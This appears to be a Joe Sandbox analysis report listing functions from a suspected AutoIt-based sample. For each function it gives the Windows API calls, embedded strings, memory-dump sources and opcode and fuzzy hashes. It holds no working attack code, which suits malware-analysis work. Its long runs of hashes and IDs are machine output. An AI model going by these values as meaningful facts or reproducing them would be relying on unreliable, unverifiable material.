                                                                            • Part of subcall function 00311D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00311D91
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00396C71
                                                                          • GetSysColor.USER32(00000012), ref: 00396C8B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                          • String ID: static
                                                                          • API String ID: 1983116058-2160076837
                                                                          • Opcode ID: e82ee7c99d76eaf2bd6e69620c43b2869016ead843e7e1e1b212a2c5d7c8088b
                                                                          • Instruction ID: 06ce99199ba977ed0c7523e2b620d722d4b13555baa23eeabf77986849a79d6c
                                                                          • Opcode Fuzzy Hash: e82ee7c99d76eaf2bd6e69620c43b2869016ead843e7e1e1b212a2c5d7c8088b
                                                                          • Instruction Fuzzy Hash: 5F212972510209AFDF06DFA8DC46AFA7BA8FB08314F114629F995D2250D735E850DB60
                                                                          Function 00396920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 003969A2
                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003969B1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: LengthMessageSendTextWindow
                                                                          • String ID: edit
                                                                          • API String ID: 2978978980-2167791130
                                                                          • Opcode ID: c5c6bd1ee1638964ff6f23f303a27061e993456b22e46561fd221978a4bb28da
                                                                          • Instruction ID: 14efc325fefd7a986f143afb9854452a2a16a4a6052f662b255f7f5dc6eb6942
                                                                          • Opcode Fuzzy Hash: c5c6bd1ee1638964ff6f23f303a27061e993456b22e46561fd221978a4bb28da
                                                                          • Instruction Fuzzy Hash: 38116D71502204AFEF128E649C46EEB376DEB06378F514724F9A5961E0C735DC509760
                                                                          Function 003729AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00372A22
                                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00372A41
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: InfoItemMenu_memset
                                                                          • String ID: 0
                                                                          • API String ID: 2223754486-4108050209
                                                                          • Opcode ID: e7560456ab8040fb82c0b381d762408b69e656ed41a938fb52796df13d6b64e5
                                                                          • Instruction ID: 05304f0c80b2b2446a2c44d855d5bee980411b090e96adb45ea36dfc838f93bf
                                                                          • Opcode Fuzzy Hash: e7560456ab8040fb82c0b381d762408b69e656ed41a938fb52796df13d6b64e5
                                                                          • Instruction Fuzzy Hash: CA11D332D01118AFCB73DB58D844B9B73BCAB46300F168022E95DE7290DB34AD06C791
                                                                          Function 003821D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0038222C
                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00382255
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$OpenOption
                                                                          • String ID: <local>
                                                                          • API String ID: 942729171-4266983199
                                                                          • Opcode ID: 2059d0b1ec01c2fa8929982b1901f14ea6bf71a1d8499b8a8f235a80f4d25477
                                                                          • Instruction ID: 07b1957d52f79e437ed0d42e1ca058bb83ab7ce973156354fff4531b8fc37449
                                                                          • Opcode Fuzzy Hash: 2059d0b1ec01c2fa8929982b1901f14ea6bf71a1d8499b8a8f235a80f4d25477
                                                                          • Instruction Fuzzy Hash: 8711A0B0541325BEDB66AF518C88EBBFBACFF16751F10866AF91586400D2705990D7F0
                                                                          Function 0032092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00313C14,003D52F8,?,?,?), ref: 0032096E
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          • _wcscat.LIBCMT ref: 00354CB7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FullNamePath_memmove_wcscat
                                                                          • String ID: S=
                                                                          • API String ID: 257928180-768595482
                                                                          • Opcode ID: b139a250bc44ac69f906135999d515d741bf576305ed34a62a6af46786e0d5c3
                                                                          • Instruction ID: cef7dec4bcfce08637958d7213392bf3206ff281f80297bbdeaf0206f3887c12
                                                                          • Opcode Fuzzy Hash: b139a250bc44ac69f906135999d515d741bf576305ed34a62a6af46786e0d5c3
                                                                          • Instruction Fuzzy Hash: 4111A535A05218ABCB47FBA4E846FDD73F8AF0C350F0044A6F945DB296EB70A6C84B50
                                                                          Function 00368E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 0036AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0036AABC
                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00368E73
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 372448540-1403004172
                                                                          • Opcode ID: 684c4e7cf6b495f04a44c989455de02fb82907e86dfba7f824a1cfe45c8bec06
                                                                          • Instruction ID: d908676b6a89174faaaef134d3fedf933e43ef5cee6f0f269037771475c67c51
                                                                          • Opcode Fuzzy Hash: 684c4e7cf6b495f04a44c989455de02fb82907e86dfba7f824a1cfe45c8bec06
                                                                          • Instruction Fuzzy Hash: 4001F5B1615218AB8B1AEBA0CC42DFE736CAF09320B044A19F831AB2D1DE325818C650
                                                                          Function 00368CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 0036AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0036AABC
                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00368D6B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 372448540-1403004172
                                                                          • Opcode ID: 9289ad556c129735d311f9ffb6927cdff75bf742eed44fc400a056a81fec29ed
                                                                          • Instruction ID: 110bea2bbd3622a0cd0052c91a0db815141a6eab45f42d1799ff0e253978ad98
                                                                          • Opcode Fuzzy Hash: 9289ad556c129735d311f9ffb6927cdff75bf742eed44fc400a056a81fec29ed
                                                                          • Instruction Fuzzy Hash: 0701F771A41108ABCB1BEBE0C956EFE73ACDF19300F14411AB801BB2D5DE119E18D672
                                                                          Function 00368D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 0036AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0036AABC
                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00368DEE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 372448540-1403004172
                                                                          • Opcode ID: b38fb35fb5d6d92f6cc147ff006151cc534a93b9c44ce3ae65e7f2a3a93607e7
                                                                          • Instruction ID: 531f317eb00ea0fb2d1de92fcf6573452798cb014a6002596b0b9201dd8aad18
                                                                          • Opcode Fuzzy Hash: b38fb35fb5d6d92f6cc147ff006151cc534a93b9c44ce3ae65e7f2a3a93607e7
                                                                          • Instruction Fuzzy Hash: 12012B71A45108BBCB17E7E4C952EFE73ACCF19300F144116B801B72D5DE114E18D672
                                                                          Function 0036C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 0036C534
                                                                            • Part of subcall function 0036C816: _memmove.LIBCMT ref: 0036C860
                                                                            • Part of subcall function 0036C816: VariantInit.OLEAUT32(00000000), ref: 0036C882
                                                                            • Part of subcall function 0036C816: VariantCopy.OLEAUT32(00000000,?), ref: 0036C88C
                                                                          • VariantClear.OLEAUT32(?), ref: 0036C556
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Init$ClearCopy_memmove
                                                                          • String ID: d}<
                                                                          • API String ID: 2932060187-90292690
                                                                          • Opcode ID: 24949f50fc333216823f170f12d7827553b360bcdaeefc564223c8264f2bd79f
                                                                          • Instruction ID: 5f7897e9a7f54b4dd9891a5a1e236899ebcd92c155453a68f100768d62a06d18
                                                                          • Opcode Fuzzy Hash: 24949f50fc333216823f170f12d7827553b360bcdaeefc564223c8264f2bd79f
                                                                          • Instruction Fuzzy Hash: 7B11FA719007089FC721DFAAD88499AB7F8FB08310B50862FE58AD7611E771AA45CF90
                                                                          Function 00374F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName_wcscmp
                                                                          • String ID: #32770
                                                                          • API String ID: 2292705959-463685578
                                                                          • Opcode ID: e4e7b2b1f1e4a5481f47a0229f5791848675113fb63a4a00075ae4daa868e0b3
                                                                          • Instruction ID: 6d17ff3a7e4ba098244694385331acb7ca576fb01aa6bcb6cb4dc7f580bea7f5
                                                                          • Opcode Fuzzy Hash: e4e7b2b1f1e4a5481f47a0229f5791848675113fb63a4a00075ae4daa868e0b3
                                                                          • Instruction Fuzzy Hash: B8E0D8326002282BE7219B99AC4AFA7F7ACEB46B70F01006BFD04D7051DA70AB5587E1
                                                                          Function 0034B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0034B314: _memset.LIBCMT ref: 0034B321
                                                                            • Part of subcall function 00330940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0034B2F0,?,?,?,0031100A), ref: 00330945
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,0031100A), ref: 0034B2F4
                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0031100A), ref: 0034B303
                                                                          Strings
                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0034B2FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                          • API String ID: 3158253471-631824599
                                                                          • Opcode ID: 4ab3db112215858b90e4d4e9755d74d82cea89e42a54cd814fafadcce716bc8e
                                                                          • Instruction ID: 4c873e3cbf09df3ea18e183b82571a2ae940794d9e5c42571e62724fc43cbced
                                                                          • Opcode Fuzzy Hash: 4ab3db112215858b90e4d4e9755d74d82cea89e42a54cd814fafadcce716bc8e
                                                                          • Instruction Fuzzy Hash: 5EE092782007108FD727DF2AE504386BBE8AF04348F018E2DE486CB650E7B5E444CBA1
                                                                          Function 00367C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00367C82
                                                                            • Part of subcall function 00333358: _doexit.LIBCMT ref: 00333362
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Message_doexit
                                                                          • String ID: AutoIt$Error allocating memory.
                                                                          • API String ID: 1993061046-4017498283
                                                                          • Opcode ID: bd9168fd2e41962331631a2e4d53b39833dd5bb6da9844139d3ea1104923df22
                                                                          • Instruction ID: 5b91c96e8e11612049338559dcb3d6406b9376789f9d230b1fa12cc16b27ec67
                                                                          • Opcode Fuzzy Hash: bd9168fd2e41962331631a2e4d53b39833dd5bb6da9844139d3ea1104923df22
                                                                          • Instruction Fuzzy Hash: 33D0123238835836D21732A56C46FDA65488F05B66F044426FB049D5D349D2899042A5
                                                                          Function 00351935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00351775
                                                                            • Part of subcall function 0038BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0035195E,?), ref: 0038BFFE
                                                                            • Part of subcall function 0038BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0038C010
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0035196D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                          • String ID: WIN_XPe
                                                                          • API String ID: 582185067-3257408948
                                                                          • Opcode ID: c1946b31641fa09a8169c06afcb65995b9e510f21cbf47650b279f1a839ebf58
                                                                          • Instruction ID: d50cbec8920be4e3d4b42899827820fa7ff80308b7df88811f110d26452360a5
                                                                          • Opcode Fuzzy Hash: c1946b31641fa09a8169c06afcb65995b9e510f21cbf47650b279f1a839ebf58
                                                                          • Instruction Fuzzy Hash: 82F0A571801109EFDB16DB95D984BECBBBCAB0C302F541096E502A65A1D7754F88DF60
                                                                          Function 00395964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0039596E
                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00395981
                                                                            • Part of subcall function 00375244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003752BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FindMessagePostSleepWindow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 529655941-2988720461
                                                                          • Opcode ID: 72a04847271583d91241c99085689b240b56c9206cdaeb7930e99a96ee05f08c
                                                                          • Instruction ID: 0e18368bd11e646b28254407b36a985e4b80f4253e1889c5e33b0e5cbb79287a
                                                                          • Opcode Fuzzy Hash: 72a04847271583d91241c99085689b240b56c9206cdaeb7930e99a96ee05f08c
                                                                          • Instruction Fuzzy Hash: 4DD0C931784311BBE769AB709C0BFD76A18AB01B51F01082AB24AEA1D1C9E59C00C654
                                                                          Function 00395998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003959AE
                                                                          • PostMessageW.USER32(00000000), ref: 003959B5
                                                                            • Part of subcall function 00375244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003752BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FindMessagePostSleepWindow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 529655941-2988720461
                                                                          • Opcode ID: f29a2498c830342a781e5274bcf4761eeaac0bb33e71d3b46b9a3d3a253222f4
                                                                          • Instruction ID: 4a47593c439972edc2aa22c210813c6a97026c9cc21a0296fb45d5136455377a
                                                                          • Opcode Fuzzy Hash: f29a2498c830342a781e5274bcf4761eeaac0bb33e71d3b46b9a3d3a253222f4
                                                                          • Instruction Fuzzy Hash: C4D0C9317803117BE76AAB709C0BFD76618AB05B51F01082AB24AEA1D1C9E5AC00C658